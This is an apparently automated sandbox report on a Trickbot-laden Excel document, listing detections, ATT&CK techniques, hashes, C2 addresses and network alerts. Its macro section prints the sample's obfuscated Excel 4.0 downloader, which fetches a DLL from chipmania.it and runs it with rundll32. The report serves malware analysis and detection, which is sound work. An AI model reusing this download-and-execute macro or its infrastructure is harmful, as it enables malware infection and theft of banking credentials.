Analysis Report SecuriteInfo.com.Exploit.Siggen3.10350.13127.32739
Overview
General Information
Sample Name: | SecuriteInfo.com.Exploit.Siggen3.10350.13127.32739 (renamed file extension from 32739 to xls) |
Analysis ID: | 355606 |
MD5: | 31964397103260697c37ee4237194da9 |
SHA1: | 7c2dc1c68e4aeff9adef87c3ddfc53592c2b2c94 |
SHA256: | 12956825df5f2b791e53c1a2ab9d7afbd8e59411b01f61a1f78ef6c5770c3ef4 |
Detection
Hidden Macro 4.0 Trickbot
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match
Classification
Startup
Malware Configuration
Threatname: Trickbot
{"gtag": "rob60", "C2 list": ["200.52.147.93:443"], "modules": ["pwgrab", "mcconf"]}
Yara Overview
Initial Sample
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC | |
Memory Dumps
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | |
Unpacked PEs
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
 | JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | |
Sigma Overview
System Summary:
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team |
Signature Overview
AV Detection:
Antivirus detection for URL or domain
Source: | Avira URL Cloud: |
Found malware configuration
Source: | Malware Configuration Extractor: |
Multi AV Scanner detection for submitted file
Source: | Virustotal: |
Yara detected Trickbot
Source: | File source: |
Source: | Code function: |
Compliance:
Uses insecure TLS / SSL version for HTTPS connection
Source: | HTTPS traffic detected: |
Uses new MSVCR Dlls
Source: | File opened: |
Binary contains paths to debug symbols
Source: | Binary string: |
Source: | Code function: |
Software Vulnerabilities:
Document exploit detected (drops PE files)
Source: | File created: |
Document exploit detected (UrlDownloadToFile)
Source: | Section loaded: |
Document exploit detected (process start blacklist hit)
Source: | Process created: |
Source: | Memory has grown: |
Source: | Code function: |
Source: | DNS query: |
Source: | TCP traffic: |
Networking:
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: | Snort IDS: |
C2 URLs / IPs found in malware configuration
Source: | IPs: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: |
Source: | HTTPS traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: |
Source: | File created: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: |
Source: | Network traffic detected: |
E-Banking Fraud:
Yara detected Trickbot
Source: | File source: |
System Summary:
Found malicious Excel 4.0 Macro
Source: | Initial sample: |
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas
Source: | Initial sample: |
Office process drops PE file
Source: | File created: |
Source: | Memory allocated: |
Source: | Code function: |
Source: | Code function: |
Source: | OLE indicator, VBA macros: |
Source: | Dropped File: |
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | Code function: |
Source: | File created: |
Source: | Mutant created: |
Source: | File created: |
Source: | OLE indicator, Workbook stream: |
Source: | System information queried: |
Source: | File read: |
Source: | Key opened: |
Source: | Process created: |
Source: | Virustotal: |
Source: | Process created: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: |
Source: | Code function: |
Source: | File created: |
Source: | File created: |
Source: | File created: |
Boot Survival:
Drops PE files to the user root directory
Source: | File created: |
Source: | Registry key monitored for changes: |
Source: | Process information set: |
Malware Analysis System Evasion:
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Source: | Function Chain: |
Tries to detect virtualization through RDTSC time measurements
Source: | RDTSC instruction interceptor: |
Source: | Code function: |
Source: | Code function: |
Source: | Dropped PE file which has not been started: |
Source: | Last function: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
HIPS / PFW / Operating System Protection Evasion:
Allocates memory in foreign processes
Source: | Memory allocated: |
Writes to foreign memory regions
Source: | Memory written: |
Source: | Process created: |
Source: | Binary or memory string: |
Source: | Queries volume information: |
Stealing of Sensitive Information:
Yara detected Trickbot
Source: | File source: |
Yara detected Trickbot
Source: | File source: |
Remote Access Functionality:
Yara detected Trickbot
Source: | File source: |
Yara detected Trickbot
Source: | File source: |
Mitre Att&ck Matrix
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Access Token Manipulation1 | Masquerading121 | OS Credential Dumping | Query Registry1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel22 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Process Injection212 | Disable or Modify Tools2 | LSASS Memory | Security Software Discovery12 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Extra Window Memory Injection1 | Access Token Manipulation1 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection212 | NTDS | System Network Configuration Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol113 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | File and Directory Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information2 | Cached Domain Credentials | System Information Discovery113 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll321 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Extra Window Memory Injection1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Behavior Graph
Screenshots
Antivirus, Machine Learning and Genetic Malware Detection
Initial Sample
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
 | 11% | Virustotal | | Browse |
Dropped Files
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
 | 11% | Metadefender | | Browse |
 | 6% | ReversingLabs | Win32.Trojan.Trickpak | |
Unpacked PE Files
No Antivirus matches
Domains
URLs
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
 | 0% | URL Reputation | safe | |
 | 0% | Avira URL Cloud | safe | |
 | 5% | Virustotal | | Browse |
 | 100% | Avira URL Cloud | malware | |
Domains and IPs
Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
chipmania.it | 185.81.0.78 | true | false | | unknown |
www.chipmania.it | unknown | unknown | false | | unknown |
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
 | true | | unknown |
URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
 | | false | | high |
 | | false | | unknown |
 | | false | | low |
Contacted IPs
Public
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
142.202.191.164 | unknown | Reserved | | 398019 | DYNUUS | true |
108.170.20.75 | unknown | United States | | 20454 | SSASN2US | true |
185.81.0.78 | unknown | Italy | | 52030 | SERVERPLAN-ASIT | false |
200.52.147.93 | unknown | Honduras | | 27932 | RedesyTelecomunicacionesHN | true |
General Information
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 355606 |
Start date: | 20.02.2021 |
Start time: | 03:16:16 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 2s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | SecuriteInfo.com.Exploit.Siggen3.10350.13127.32739 (renamed file extension from 32739 to xls) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.expl.evad.winXLS@9/11@1/4 |
EGA Information: | Failed |
HDC Information: | |
HCA Information: | Failed |
Cookbook Comments: | |
Warnings: | |
Simulations
Behavior and APIs
Time | Type | Description |
---|---|---|
03:16:38 | API Interceptor | |
Joe Sandbox View / Context
IPs
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
142.202.191.164 | | | malicious | Browse | |
108.170.20.75 | | | malicious | Browse | |
185.81.0.78 | | | malicious | Browse | |
Domains
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
ASN
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
DYNUUS | | | malicious | Browse | |
RedesyTelecomunicacionesHN | | | malicious | Browse | |
SSASN2US | | | malicious | Browse | |
SERVERPLAN-ASIT | | | malicious | Browse | |
JA3 Fingerprints
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
8c4a22651d328568ec66382a84fc505f | | | malicious | Browse | |
Dropped Files |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes | Get hash | malicious | Browse | ||
C:\Users\user\BASE.BABAA | Get hash | malicious | Browse | ||
Created / dropped Files |
---|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 59134 |
Entropy (8bit): | 7.995450161616763 |
Encrypted: | true |
SSDEEP: | 1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk |
MD5: | E92176B0889CC1BB97114BEB2F3C1728 |
SHA1: | AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443 |
SHA-256: | 58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3 |
SHA-512: | CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 328 |
Entropy (8bit): | 3.078657124509345 |
Encrypted: | false |
SSDEEP: | 6:kK7APbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:DAW3kPlE99SNxAhUeo+aKt |
MD5: | 76C4F94E3F31035415F533015971BE6E |
SHA1: | C7A8552A39CA176E310DCAFCF2D198808FCE970D |
SHA-256: | 2341CC65476F6D7FAEA43753B543EFF7DDC8CEB07F2DA3D8C33D695B24D8688C |
SHA-512: | 066B27D84C6FD5A717D377649DCE5534749D1F15DA2E4A73B9D5B0715029A7E8B64ADE266D2369D7C5DA9B62986B90BD2856A2A85AEFE3093931972FE5645883 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 4591104 |
Entropy (8bit): | 5.0540147937501265 |
Encrypted: | false |
SSDEEP: | 49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9 |
MD5: | 25056DF6D3546DE971EAFE5DA5F9AE44 |
SHA1: | 179555B3D0391E45DF29E651B8ED0342D02FE88A |
SHA-256: | AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB |
SHA-512: | 8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Reputation: | moderate, very likely benign file |
IE Cache URL: | http://www.chipmania.it/mails/open.php |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 155530 |
Entropy (8bit): | 7.660500020953335 |
Encrypted: | false |
SSDEEP: | 3072:YxWVpupSzxNEBBD+Os7/xxkKCtRbsYO1entseoXXa:YEGSzx0dmxk7RbsYsKtseoXq |
MD5: | 2C9F8E47B1600F5DE2F6DCDFB24094CC |
SHA1: | D4BE003987DD33946B0636CFA3CA7F22095B65B5 |
SHA-256: | A8EAB1FB3FE63C24CD13039896ADA32D0463BB1D31ECEDC59C02E661EB4054CF |
SHA-512: | 4256D5E72B27028E98B2E896211A25D2DD3102E4625DEA37AFB2FF7E4117025952B26AA399E9673B9EF0C782376001E9E894A0B4A4B88775945F5D35F65B201D |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | modified |
Size (bytes): | 152788 |
Entropy (8bit): | 6.316654432555028 |
Encrypted: | false |
SSDEEP: | 1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx |
MD5: | 64FEDADE4387A8B92C120B21EC61E394 |
SHA1: | 15A2673209A41CCA2BC3ADE90537FE676010A962 |
SHA-256: | BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745 |
SHA-512: | 655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.495155303444507 |
Encrypted: | false |
SSDEEP: | 12:85Q+pgLgXg/XAlCPCHaXSzB8aB/OxJX+WnicvbLbDtZ3YilMMEpxRljKrcCTdJP8:85jk/XTK6aEJYe7Dv3qSnrNru/ |
MD5: | 6AD8E80E987BF8C934BD3809D8B2B24A |
SHA1: | 6E7E22616035724B1F851AFD0DB24BF745C1A49D |
SHA-256: | A48DD1DA24A3FFD1E5FF10E8314D8FB031D4741E37E22FD8297E4F440144FE54 |
SHA-512: | F8BD2A5C8116945136D106753122AABC98EF29877E246A2CDC4FECDE777DEDEC2AF167DB6FF6BB86C53ACD56359B29AAFDF95851D1DCC39C612C2F94AA31F976 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2368 |
Entropy (8bit): | 4.581927649821565 |
Encrypted: | false |
SSDEEP: | 48:8BN/XTZaiHCqQFHCCWQh2BN/XTZaiHCqQFHCCWQ/:8BN/X1aiiyCWQh2BN/X1aiiyCWQ/ |
MD5: | 6463D8D40C4CE9238290D3D9B27C30F2 |
SHA1: | 5DB759C84513B007B87571B18FAEC5140DA23B9C |
SHA-256: | 16E680D0309BC36471D6668FC9142E40093A5879F6EDD687A1F3AB88B07D4412 |
SHA-512: | 8B5622C40D905FE466777FCD5A61C9F3BBD8C563A969DE585EFC0B41BD00260C7FD8A340E47AB7A754CFFF8010129379DCB1D15611F29C444E179E9812329D7D |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 185 |
Entropy (8bit): | 4.864166697857585 |
Encrypted: | false |
SSDEEP: | 3:oyBVomM0bcsoMW3k2uscbcsoMW3k2mM0bcsoMW3k2v:dj60wsoMW0nwsoMW0o0wsoMW0I |
MD5: | C69269D3656A2431308C88DEF4D4F13F |
SHA1: | F674A7D59F59141335B18F2B639B47DBCE39B7A9 |
SHA-256: | EE99BFC929243FB6DE7456053F6298AF672490869E31DB431EBC927E07483DD2 |
SHA-512: | 15C6248901F8FDF3DFD060938B7E70AD372878E99DB616F33129A788004190E3F6AA10D7CF5810F57798A09980A61017191F1606D304B719826EE4A6741AAA63 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4591104 |
Entropy (8bit): | 5.0540147937501265 |
Encrypted: | false |
SSDEEP: | 49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9 |
MD5: | 25056DF6D3546DE971EAFE5DA5F9AE44 |
SHA1: | 179555B3D0391E45DF29E651B8ED0342D02FE88A |
SHA-256: | AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB |
SHA-512: | 8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 177025 |
Entropy (8bit): | 7.2399467144037395 |
Encrypted: | false |
SSDEEP: | 3072:zccKoSsxzNDZLDZjlbR868O8KL5L+4iK2xEtjPOtioVjDGUU1qfDlaGGx+cL2QnM:4cKoSsxzNDZLDZjlbR868O8KL5L+4iKI |
MD5: | E48CD2A56FE62C58737B52EADBA85D78 |
SHA1: | B43686D2ADBFBE3F46F740B3EE2E5B9C64634041 |
SHA-256: | 3152805E9D9C73AD3F4697857DD09D126EFDC3BF9B81C57C2BC385F741495172 |
SHA-512: | 449E2593CDAD3C634F41E0FD35465EF74FD7B2FB2BC5885CDEC7CDA6929E2DEE0FCF43610DB04515B4EC8416D8142CCEA693ED5731971991CEE2CF62D01FF77B |
Malicious: | false |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.195176543915214 |
TrID: |
|
File name: | SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls |
File size: | 168960 |
MD5: | 31964397103260697c37ee4237194da9 |
SHA1: | 7c2dc1c68e4aeff9adef87c3ddfc53592c2b2c94 |
SHA256: | 12956825df5f2b791e53c1a2ab9d7afbd8e59411b01f61a1f78ef6c5770c3ef4 |
SHA512: | 0440996111d6eada8a6f1389d0658adcc291b2d1000b5f47c83cc3c03673f4e4cc89ff9d21a3b7ad02b13e208241ff0432286201f254d15b1167fdbbf074c352 |
SSDEEP: | 3072:bScKoSsxzNDZLDZjlbR868O8KlVH3jiKq7uDphYHceXVhca+fMHLtyeGxcl8OUMD:OcKoSsxzNDZLDZjlbR868O8KlVH3jiKe |
File Content Preview: | ........................>.......................H...........................E...F...G.......................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "SecuriteInfo.com.Exploit.Siggen3.10350.13127.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-02-19 10:48:36 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 917504 |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.357299206868 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e3 04 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.247217286775 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 |
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 157800 |
---|
General | |
---|---|
Stream Path: | Workbook |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 157800 |
Entropy: | 7.46869820242 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . |
Data Raw: | 09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
,,,,,,,,,"=RIGHT(""353454543rtertetr,DllRegister"",12)&V19",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""KJHDFHURNVUTRSHYSTNLUURTHNBDZZLRDNYZru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,,,,,=HALT(),,,
"=FORMULA.FILL(A144,DocuSign!V19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""YJDYJGYDJNUDTUXTNXYXNuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""JDHNLTVJRBNZXKHTFHNMXTFUXTownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCC""&A146,""YUTVUBSRNYTMYM"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=YUTVUBSRNYTMYM(0,T137&D144&E144&E145&E146&E147,D141,0,0)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""hLKUYFBGVESLTNZBRHYMHYRZndll32"",6)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""XCVBDSTYFGYSDUZGKLRDHZTDJ..\BASE.BABAA"",13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,Server,,,www.chipmania.it/mails/open,.,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,BB,,,,h,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
02/20/21-03:17:14.088896 | TCP | 2404306 | ET CNC Feodo Tracker Reported CnC Server TCP group 4 | 49166 | 443 | 192.168.2.22 | 142.202.191.164 |
02/20/21-03:17:16.980781 | TCP | 2404302 | ET CNC Feodo Tracker Reported CnC Server TCP group 2 | 49168 | 443 | 192.168.2.22 | 108.170.20.75 |
02/20/21-03:18:00.666014 | TCP | 2404324 | ET CNC Feodo Tracker Reported CnC Server TCP group 13 | 49170 | 443 | 192.168.2.22 | 200.52.147.93 |
02/20/21-03:19:11.713314 | TCP | 2404316 | ET CNC Feodo Tracker Reported CnC Server TCP group 9 | 49171 | 443 | 192.168.2.22 | 186.137.85.76 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
